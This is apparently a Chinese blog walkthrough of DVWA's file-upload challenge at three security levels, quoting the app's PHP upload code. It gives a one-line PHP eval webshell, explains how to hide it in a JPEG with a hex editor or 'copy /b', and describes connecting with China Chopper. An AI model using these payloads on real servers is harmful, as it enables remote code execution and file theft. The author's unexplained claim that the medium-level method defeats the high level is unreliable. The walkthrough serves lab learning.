LOW Level
代码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
DVWA_WEB_PAGE_TO_ROOT
为网页的根目录
target_path
变量为上传文件的绝对路径
basename( $_FILES['uploaded']['name'])
将文件中已经uploaded的文件的名字取出并加入到target_path变量中。
if语句判断文件是否上传到指定的路径中,若没有则显示没有上传。
总的可见,此级别没有对上传文件的类型进行任何的过滤,也就是可以随意上传php文件。
我们先构造一个一句话木马:
<?php @eval($_POST[value]);?>
用记事本打开,写入后保存,重命名为.php文件
然后上传
上传成功,复制路径/hackable/uploads/1muma.php贴到http://127.0.0.1/dvwa/后面
(其实到这里就已经完成了,我们继续扩展一下)
然后把这条URL复制下来,用中国菜刀打开
地址就刚才复制的,右边那个小框填入“value”(这个可以随便改,写在木马里的是什么就写什么)
连接成功后就可以随意上传下载对方电脑里的文件了
Medium
先看代码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
与Low级相比增加了三个变量分别用于表示上传文件的名字、类型和大小
在if语句中判断上传文件的类型是否为“image/jpeg”和大小是否小于100kb。这里也只是简单地设置检测文件的类型,因此我们可以把一句话木马写进图片中。
方法一:
这里使用到了C32工具(建议大家在虚拟机使用,网上随便下载的话捆绑软件太多)
如图把图片拖进工具里,选择十六进制模式,然后把一句话木马加到最后保存文件。把文件后缀改回.jpg,图片还是能正常显示。
上传成功,我们把文件夹里上次那个木马删掉,试试这个木马能不能成功用菜刀连接:
我们先直接在浏览器访问:
直接访问到了图片,用菜刀连:
成功了!
方法二:
cmd进入终端:
copy /b 1.jpg+1.asp 2.jpg
1.jpg 是你想上传的图片,1.asp或者1.php 是木马脚本,2.jpg是合成后的图片
成功了
High
先看看代码
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
emmmmmm 说实话,本人暂时还未学php 语言,看不太懂有什么区别,实际上按照medium的解决方法一样可以完成…具体有什么玄机等我PHP学成归来后再修改~